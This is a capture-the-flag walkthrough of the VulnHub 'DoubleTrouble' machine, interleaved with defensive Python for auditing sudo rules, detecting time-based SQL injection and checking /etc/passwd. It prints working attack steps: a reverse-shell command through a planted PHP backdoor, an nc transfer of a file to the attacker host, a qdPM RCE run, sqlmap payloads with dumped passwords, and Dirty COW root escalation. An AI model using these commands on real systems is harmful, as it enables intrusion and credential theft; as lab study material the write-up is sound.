Port scanning

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 19:09 HKT
Nmap scan report for 192.168.56.103
Host is up (0.00040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:C2:7D:2A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.73 seconds
┌──(mikannse㉿kali)-[~/vulnhub]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 19:09 HKT
Nmap scan report for 192.168.56.103
Host is up (0.00038s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: qdPM | Login
MAC Address: 08:00:27:C2:7D:2A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds

Getshell

Visiting http://double.hub/core/config/databases.yml

gives

all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: otis
      password: "<?php echo urlencode('rush') ; ?>"
      attributes:
        quote_identifier: true

This gives otis:rush

But logging in (and therefore the RCE) requires the email address, which is not known at this point.

A directory scan turns up a /secret directory.

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ gobuster dir -u http://double.hub/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,txt,zip,bak,rar,sql,pdf
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://double.hub/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: rar,sql,pdf,php,txt,zip,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 275]
/images (Status: 301) [Size: 309] [--> http://double.hub/images/]
/index.php (Status: 200) [Size: 5806]
/uploads (Status: 301) [Size: 310] [--> http://double.hub/uploads/]
/css (Status: 301) [Size: 306] [--> http://double.hub/css/]
/template (Status: 301) [Size: 311] [--> http://double.hub/template/]
/core (Status: 301) [Size: 307] [--> http://double.hub/core/]
/install (Status: 301) [Size: 310] [--> http://double.hub/install/]
/js (Status: 301) [Size: 305] [--> http://double.hub/js/]
/check.php (Status: 200) [Size: 0]
/sf (Status: 301) [Size: 305] [--> http://double.hub/sf/]
/readme.txt (Status: 200) [Size: 470]
/robots.txt (Status: 200) [Size: 26]
/secret (Status: 301) [Size: 309] [--> http://double.hub/secret/]
/backups (Status: 301) [Size: 310] [--> http://double.hub/backups/]
/batch (Status: 301) [Size: 308] [--> http://double.hub/batch/]
/.php (Status: 403) [Size: 275]
/server-status (Status: 403) [Size: 275]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

Visiting /secret yields an image, which turns out to contain steganographically hidden data.

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ stegseek doubletrouble.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".

This gives:

otisrush@localhost.com
otis666

Look up known exploits

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ searchsploit qdPM
------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------- ---------------------------------
qdPM 7 - Arbitrary File upload | php/webapps/19154.py
qdPM 7.0 - Arbitrary '.PHP' File Upload (Metasploit) | php/webapps/21835.rb
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting | php/webapps/48486.txt
qdPM 9.1 - 'filter_by' SQL Injection | php/webapps/45767.txt
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting | php/webapps/46399.txt
qdPM 9.1 - 'search_by_extrafields[]' SQL Injection | php/webapps/46387.txt
qdPM 9.1 - 'type' Cross-Site Scripting | php/webapps/46398.txt
qdPM 9.1 - Arbitrary File Upload | php/webapps/48460.txt
qdPM 9.1 - Remote Code Execution | php/webapps/47954.py
qdPM 9.1 - Remote Code Execution (Authenticated) | php/webapps/50175.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2) | php/webapps/50944.py
qdPM 9.2 - Cross-site Request Forgery (CSRF) | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
qdPM < 9.1 - Remote Code Execution | multiple/webapps/48146.py

With credentials in hand, go straight to the RCE exploit; the script automatically writes a backdoor.

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ python 50944.py -url http://double.hub/ -u otisrush@localhost.com -p otis666
You are not able to use the designated admin account because they do not have a myAccount page.

The DateStamp is 2024-10-13 06:30
Backdoor uploaded at - > http://double.hub/uploads/users/399546-backdoor.php?cmd=whoami

Get a reverse shell

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ curl 'http://double.hub/uploads/users/399546-backdoor.php?cmd=nc%20192.168.56.102%20443%20-e%20%2Fbin%2Fbash'

Privilege escalation

There is a sudo entry we can run

www-data@doubletrouble:~/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awk
www-data@doubletrouble:~/html$ sudo /usr/bin/awk 'BEGIN {system("/bin/sh")}'
sudo /usr/bin/awk 'BEGIN {system("/bin/sh")}'
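The awk rule above is a textbook shell-escape entry: a sudoers audit that parses `sudo -l` output and flags binaries able to spawn a shell is an added example here, not part of the original writeup; the list of escape-capable binaries and the second, benign rule in the sample are assumptions.

```python
import re

# Binaries that can spawn a shell or run arbitrary commands from inside the
# program, so a sudo entry for them is effectively root. Illustrative list,
# not exhaustive (assumption); "ALL" covers a rule that permits any command.
SHELL_ESCAPE_BINARIES = {"awk", "gawk", "mawk", "vi", "vim", "less", "more",
                         "find", "perl", "python", "python3", "bash", "sh",
                         "env", "tar", "zip", "nmap", "man", "ALL"}

# One sudo rule as `sudo -l` prints it: "(runas) TAG: cmd1, cmd2"
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_l(output):
    """Parse the rules block of `sudo -l` output and return one
    (command, run_as, nopasswd, risky) tuple per command."""
    findings, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_rules = True          # everything after this header is a rule
            continue
        m = ENTRY_RE.match(line) if in_rules else None
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]   # "/usr/bin/awk" -> "awk"
            risky = binary in SHELL_ESCAPE_BINARIES
            findings.append((cmd, m.group("runas").strip(), nopasswd, risky))
    return findings

# Constructed sample: the rule found on the box plus a benign one for contrast.
SAMPLE = """Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for cmd, runas, nopasswd, risky in audit_sudo_l(SAMPLE):
        tag = "RISK" if risky else "ok  "
        print(f"[{tag}] ({runas}) {'NOPASSWD: ' if nopasswd else ''}{cmd}")
```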

But there is also an .ova in /root; download it

# cat doubletrouble.ova |nc 192.168.56.102 1234
cat doubletrouble.ova |nc 192.168.56.102 1234

Port scanning (the nested VM)

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 19:47 HKT
Nmap scan report for 192.168.56.104
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:2A:55:9E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.80 seconds
┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 19:47 HKT
Nmap scan report for 192.168.56.104
Host is up (0.00035s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
| ssh-hostkey:
| 1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
| 2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
|_ 256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Debian)
MAC Address: 08:00:27:2A:55:9E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds

SQL injection

Port 80 hosts a site consisting only of index.php; capture a login request and feed it to sqlmap.

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ sqlmap -r sql.txt --level 5 --risk 3 --batch
___
__H__
___ ___[']_____ ___ ___ {1.8.9#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:57:00 /2024-10-13/

[19:57:01] [INFO] parsing HTTP request from 'sql.txt'
[19:57:01] [INFO] resuming back-end DBMS 'mysql'
[19:57:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=11' AND (SELECT 6123 FROM (SELECT(SLEEP(5)))UvOg) AND 'gYYV'='gYYV&psw=11&btnLogin=Login
---
[19:57:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7 (wheezy)
web application technology: PHP 5.5.38, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.12
[19:57:01] [INFO] fetched data logged to text files under '/home/mikannse/.local/share/sqlmap/output/192.168.56.104'

[*] ending @ 19:57:01 /2024-10-13/
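The injection point sqlmap reports is time-based blind: the payload does nothing but stall the database. As an added example (not part of the original writeup), a request-side detector for that pattern over constructed POST bodies, including the payload above; the field names match the page, the other bodies are assumptions. The real fix is a parameterised query in index.php.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Functions whose only purpose inside a login field is to stall the database:
# the signature of a time-based blind injection (MySQL, PostgreSQL, MSSQL).
DELAY_RE = re.compile(
    r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY", re.IGNORECASE)
# A quote closing a string literal followed by a boolean connector,
# i.e. the "11' AND ..." shape of the payload sqlmap found.
BREAKOUT_RE = re.compile(r"'\s*(AND|OR)\b", re.IGNORECASE)

def classify_body(body):
    """Return {param: [tags]} for each suspicious field of a urlencoded
    POST body; an empty dict means nothing matched."""
    hits = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for raw in values:
            value = unquote_plus(raw)  # parse_qs decoded once; catch double encoding
            tags = []
            if DELAY_RE.search(value):
                tags.append("delay")
            if BREAKOUT_RE.search(value):
                tags.append("breakout")
            if tags:
                hits.setdefault(name, []).extend(tags)
    return hits

# Constructed sample bodies; the second is the payload sqlmap reported.
SAMPLES = [
    "uname=montreux&psw=secret&btnLogin=Login",
    "uname=11' AND (SELECT 6123 FROM (SELECT(SLEEP(5)))UvOg) AND 'gYYV'='gYYV"
    "&psw=11&btnLogin=Login",
    # same idea, double URL-encoded to slip past a single-decode filter
    "uname=11%2527+AND+sleep%25285%2529+AND+%2527a%2527%253D%2527a&psw=x",
    "uname=o'neil&psw=pass&btnLogin=Login",   # a legitimate apostrophe
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(classify_body(body) or "clean", "<-", body[:60])
```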

Dump the database

┌──(mikannse㉿kali)-[~/vulnhub/double]
└─$ sqlmap -r sql.txt --dump

This yields two accounts

+----------+----------+
| password | username |
+----------+----------+
| GfsZxc1 | montreux |
| ZubZub99 | clapton |
+----------+----------+

The second account can log in over SSH.

Privilege escalation

The kernel version is very old, so try Dirty COW.

Upload the exploit to the target and compile it.

clapton@doubletrouble:/tmp$ gcc 40839.c -pthread -o pwn -lcrypt
clapton@doubletrouble:/tmp$ chmod +x pwn
clapton@doubletrouble:/tmp$ ./pwn
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fiTEKO3e4DQww:0:0:pwned:/root:/bin/bash

mmap: 7fd50b5b8000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1q2w3e!'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1q2w3e!'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

This creates a new root-privileged user whose password you set yourself.

clapton@doubletrouble:~$ su firefart
Password:
su: Authentication failure
clapton@doubletrouble:~$ su firefart
Password:
firefart@doubletrouble:/home/clapton# id
uid=0(firefart) gid=0(root) groups=0(root)
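The exploit leaves a second UID 0 account with its hash stored directly in /etc/passwd, which is exactly what a host-integrity check should catch. An added example, not from the writeup: an /etc/passwd audit run over a constructed sample that includes the firefart line shown above; the other entries are assumptions.

```python
# Shadowed accounts keep "x" in field 2; "*", "!" and "" are disabled markers.
# Anything else is a password hash written straight into /etc/passwd.
SHADOW_MARKERS = {"x", "*", "!", ""}

def audit_passwd(text):
    """Return a list of findings for an /etc/passwd image: UID 0 accounts
    other than root, hashes stored inline, malformed lines, missing root."""
    findings, saw_root = [], False
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        # A botched overwrite (the exploit rewrites the file in place) can
        # leave truncated or merged lines; report them rather than skip them.
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            findings.append(f"line {lineno}: malformed entry {line!r}")
            continue
        name, pw, uid, _gid, _gecos, _home, shell = fields
        if name == "root":
            saw_root = True
        if int(uid) == 0 and name != "root":
            findings.append(f"line {lineno}: extra UID 0 account {name!r} ({shell})")
        if pw not in SHADOW_MARKERS:
            findings.append(f"line {lineno}: password hash stored inline for {name!r}")
    if not saw_root:
        findings.append("root account missing")
    return findings

# Constructed sample: a Debian-style file containing the line the exploit
# output above reports as the "Complete line".
SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
clapton:x:1000:1000:clapton,,,:/home/clapton:/bin/bash
firefart:fiTEKO3e4DQww:0:0:pwned:/root:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE) or ["no findings"]:
        print(finding)
```

Comparing the live file against the exploit's own /tmp/passwd.bak (or a package manifest) is the quickest way to confirm and restore.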

Closing thoughts

A nested-VM box, and the earlier steps involve quite a bit of guesswork too.